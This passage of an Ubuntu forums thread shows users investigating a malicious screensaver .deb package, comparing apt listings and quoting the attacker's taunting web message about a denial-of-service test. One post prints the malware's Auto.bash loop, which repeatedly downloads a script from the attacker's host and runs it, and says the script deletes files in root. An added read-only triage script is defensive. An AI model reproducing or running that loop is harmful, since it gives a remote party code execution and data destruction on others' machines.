
Thread: YOU THERE!! Malicios script installed as a DEB, please read!

  1. #71
    Join Date
    Feb 2006
    Location
    Vancouver, Canada
    Beans
    Hidden!
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by akashiraffee View Post
    The real bad guy is this one:
    http://05748.t35.com
    I googled the URL and got some interesting things. It looks like this is for a phishing site to get ahold of WoW passwords or the such

    http://www.mmowned.com/forums/wow-scams/228194-wow-phishing-pack.html

    http://www.google.ca/search?q=http%3A%2F%2F05748.t35.com%2F&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
    Last edited by dmizer; December 9th, 2009 at 11:45 AM. Reason: removed hyperlink
    Registered Linux User #429850
    Work in progress: CCNA, LPIC-1

  2. #72
    Join Date
    Oct 2009
    Location
    LinuxVille
    Beans
    41
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by NoaHall View Post
    Also, could you post the output of
    Code:
     ls -a /etc/apt
    Code:
    .              sources.list              .sources.list.swm  trusted.gpg
    ..             sources.list~             .sources.list.swn  trusted.gpg~
    apt.conf.d     sources.list.d            .sources.list.swo
    preferences.d  sources.list.distUpgrade  .sources.list.swp
    secring.gpg    sources.list.save         trustdb.gpg

  3. #73
    Join Date
    Dec 2009
    Beans
    114
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    ATT: Everyone who installed that.

    I'm gonna write a little script you can run in the background for a few days that will detect if someone is still using wget on your system. I'll post it here in ~ 30 min.
    (\ /)
    (O.o)
    (> <)
    This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

  4. #74
    NoaHall is offline Iced Blended Vanilla Crème Ubuntu
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Could you post the output of
    Code:
    ls -a /etc/apt/sources.list.d/
    too? Sorry for asking a lot - I just want to make sure there's no damage.

  5. #75
    Join Date
    Oct 2009
    Location
    LinuxVille
    Beans
    41
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by akashiraffee View Post
    ATT: Everyone who installed that.

    I'm gonna write a little script you can run in the background for a few days that will detect if someone is still using wget on your system. I'll post it here in ~ 30 min.
    OK... just make sure you don't accidentally put a virus in it... O.o

  6. #76
    Join Date
    Oct 2009
    Location
    LinuxVille
    Beans
    41
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by NoaHall View Post
    Could you post the output of
    Code:
    ls -a /etc/apt/sources.list.d/
    too? Sorry for asking a lot - I just want to make sure there's no damage.
    Code:
    .                               google-chrome.list.save
    ..                              playonlinux.list
    google-chrome.list              playonlinux.list.distUpgrade
    google-chrome.list.distUpgrade  playonlinux.list.save

  7. #77
    Join Date
    Sep 2008
    Location
    Ohio
    Beans
    963
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    I'm getting into this a little late, but did anyone look at http://05748.t35.com/ in the last few minutes? Was it always like that?

    There is something rotten, and not just grammar.
    Last edited by dmizer; December 9th, 2009 at 11:48 AM. Reason: removed hyperlink

  8. #78
    Join Date
    Jan 2008
    Beans
    4,757

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by pbrane View Post
    This is the contents of the Auto.bash script.

    Code:
    while :
    do
    rm /usr/bin/run.bash
    cd /usr/bin/
    wget http://05748.t35.com/Bots/index.php
    wget http://05748.t35.com/Bots/run.bash
    sleep 4
    rm index.php
    chmod 755 run.bash
    command -p /usr/bin/run.bash
    done
    You may want to see if run.bash is running. If so, kill it. And then remove it from /usr/bin/

    gnome.sh runs Auto.bash

    Also you can whois mmowned.com and complain to the hosting company. Interesting I just looked up the hosting company and they advertise protection against DOS attacks.
    I downloaded run.bash via:
    Code:
    wget http://05748.t35.com/Bots/run.bash
    And analysed the contents to find that it is an rm command to remove all files in / (but not subdirectories).
    Last edited by ibuclaw; December 8th, 2009 at 10:57 PM. Reason: had a second look - and there was no -r
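
    Added example, not part of any post in this thread: a read-only triage script for the artifacts named above (/usr/bin/run.bash, /usr/bin/index.php, Auto.bash, gnome.sh and the download host). The function names and the directories searched in `triage` are assumptions made for illustration; the thread does not say where Auto.bash or gnome.sh are installed.

```shell
#!/bin/sh
# Added example (not from the thread): triage for the artifacts the posts name.
# From the page: /usr/bin/run.bash, /usr/bin/index.php, Auto.bash, gnome.sh,
# and the download host. Search directories in triage() are assumptions.
IOC_HOST='05748.t35.com'

# Print the files the Auto.bash loop leaves in /usr/bin, if present.
# Optional $1 is a root prefix (e.g. a mounted disk image); default is /.
find_dropped_files() {
    root=${1:-}
    for f in /usr/bin/run.bash /usr/bin/index.php; do
        [ -e "$root$f" ] && printf '%s\n' "$root$f"
    done
    return 0
}

# Read "PID ARGS" lines (ps -eo pid=,args=) on stdin; print PIDs whose command
# line names one of the scripts, or that are wget fetching from the host.
# gnome.sh is a generic name, so treat a hit on it as a lead, not a verdict.
match_processes() {
    awk -v host="$IOC_HOST" '{
        line = " " $0 " "
        n = split($2, part, "/")
        if (line ~ "[/ ](Auto[.]bash|run[.]bash|gnome[.]sh) ") print $1
        else if (part[n] == "wget" && index($0, host)) print $1
    }'
}

# List files under the given directories that mention the download host,
# which is how a startup hook pointing at the loop would show up.
find_references() {
    grep -rlF -- "$IOC_HOST" "$@" 2>/dev/null || true
}

triage() {
    echo "== dropped files";         find_dropped_files
    echo "== matching processes";    ps -eo pid=,args= | match_processes
    echo "== files naming the host"; find_references /etc /usr/bin "$HOME"
}

# Nothing is killed or deleted; run with --run to print the report.
if [ "${1:-}" = "--run" ]; then triage; fi
```

    Stop any reported process before deleting /usr/bin/run.bash, because the Auto.bash loop downloads it again on every pass.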

  9. #79
    NoaHall is offline Iced Blended Vanilla Crème Ubuntu
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Cycron: It appears to be fine. If you notice any strange behaviour, report it here.

    Taken from the site -
    If your reading this from coming from that ubuntu forums place, Well done you saw right thourgh my "Screensaver" cough cough wink wink, I can tell you this. Basically after getting some scripts to run upon start up, It then sets to work downloading another file, This can be changed on my server so in essence i could do whatever i like on your computer, But i only really want to perfrom a DOS (denial of service) attack, For no reason I'm attacking mmowned.com, Just using it as a test. Hats Off!
    Uh-oh.

    Tinvole - you did? I can't see it, only the ping.
    Last edited by NoaHall; December 8th, 2009 at 10:51 PM.

  10. #80
    Join Date
    May 2009
    Beans
    1,934
    Distro
    Ubuntu Studio 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    This is what this link (http://05748.t35.com/) says when opened via FF.

    "If your reading this from coming from that ubuntu forums place, Well done you saw right thourgh my "Screensaver" cough cough wink wink, I can tell you this. Basically after getting some scripts to run upon start up, It then sets to work downloading another file, This can be changed on my server so in essence i could do whatever i like on your computer, But i only really want to perfrom a DOS (denial of service) attack, For no reason I'm attacking mmowned.com, Just using it as a test. Hats Off! "
    Last edited by dmizer; December 9th, 2009 at 11:49 AM. Reason: removed hyperlink
